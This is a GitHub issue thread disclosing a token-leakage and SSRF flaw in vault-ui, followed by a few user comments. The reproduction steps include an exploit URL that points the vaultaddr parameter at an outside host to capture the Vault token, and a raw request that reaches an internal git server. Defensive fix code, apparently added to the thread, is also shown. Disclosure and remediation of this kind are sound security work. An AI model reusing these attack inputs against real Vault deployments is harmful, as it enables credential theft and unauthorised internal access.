djenriquez/vault-ui

Security issue. Token leakage

anton00706 opened this issue · 5 comments

Hi.
Our security team tested your UI and found a vulnerability.
Here is the feedback from them:

Steps to reproduce
Token leakage:

  1. Login to vault ui with token
  2. visit http://spb-off-vault01.team.wrike.com:8000/v1/sys/capabilities-self?vaultaddr=http:%2F%2Fifyoucanyoucantest.pythonanywhere.com%2fexamples%2fsimple_examples%2fhello3.html%3f
  3. Open file token.txt at 192.168.3.105

Access token stolen.

Internal resources access:

  1. Disable VPN and send request
    GET /v1/sys/capabilities-self?vaultaddr=https:%2F%2Fgit.wrke.in HTTP/1.1
    Host: spb-off-vault01.team.wrike.com:8000
    ...

You get the git.wrke.in content, but we assume that the attacker should have no access to it.

Actual result
Token stolen, internal resources accessed

Expected result
No SSRF

Area of Responsibility
Other

Recommendation
Do not use user input; take the value of the target host from configuration.

Currently in /src/vaultapi.js:

    let vaultAddr = req.query.vaultaddr;

but it should be something like this:

    let vaultAddr = config['vaultaddr'];
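As an added illustration of the recommendation above (this is not code from vault-ui or from the reporter), the reported pattern is shown beside a hardened variant in JavaScript. The `config` object, the `buildProxyTargetVulnerable` / `buildProxyTargetHardened` names and the sample request objects are all assumed names constructed for this example; the real handler's structure is not shown on this page. The hardened version goes a step beyond the one-line recommendation: it also rejects a request path that would escape the configured origin.

```javascript
// Added example, not vault-ui's own code. Contrasts the reported pattern
// (upstream address taken from the query string) with a hardened variant that
// only ever proxies to the server-side configured Vault address.

// Server-side configuration: the single Vault this UI is allowed to talk to.
// (Constructed value for the example.)
const config = { vaultaddr: 'https://vault.internal.example:8200' };

// Reported pattern: the target host comes from user input, so the caller
// decides where the proxied request (and the token header it carries) goes.
function buildProxyTargetVulnerable(req) {
  const vaultAddr = req.query.vaultaddr;
  return `${vaultAddr}${req.path}`;
}

// Hardened pattern: ignore the query parameter entirely and build the upstream
// URL from configuration. Returns null (caller should respond 400) when the
// requested path would resolve outside the configured origin, e.g. a
// protocol-relative path such as "//other.example/x" or an absolute URL.
function buildProxyTargetHardened(req) {
  const base = new URL(config.vaultaddr);
  let target;
  try {
    target = new URL(req.path, base);
  } catch (e) {
    return null; // unparsable path
  }
  if (target.origin !== base.origin) {
    return null; // refuse to proxy anywhere but the configured Vault
  }
  return target.toString();
}

// Constructed sample requests: a normal API call that still carries a foreign
// vaultaddr parameter, and a path that tries to change the origin.
const sampleRequest = {
  path: '/v1/sys/capabilities-self',
  query: { vaultaddr: 'http://not-our-vault.example' },
};
const escapingRequest = { path: '//other.example/v1/x', query: {} };

console.log('vulnerable :', buildProxyTargetVulnerable(sampleRequest));
console.log('hardened   :', buildProxyTargetHardened(sampleRequest));
console.log('escaping   :', buildProxyTargetHardened(escapingRequest));
```

Whatever the handler does with `vaultaddr` today, the defensive point is the same: the upstream origin is a deployment setting, never a per-request value, and any path that would resolve to a different origin is refused before a token header is attached.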

Soooo, any suggestions for another UI that's not this one, @anton00706?

@JorisInsign noice. Thanks.

  • What is the status of this issue?
  • Repro steps are not very clear.

There has been no response from a developer, nor has there been a commit since this issue was opened.

So at this point, I don't even care if the issue is real. (Though I think it is). Clearly using Vault-UI to access (company) secrets is a no-go.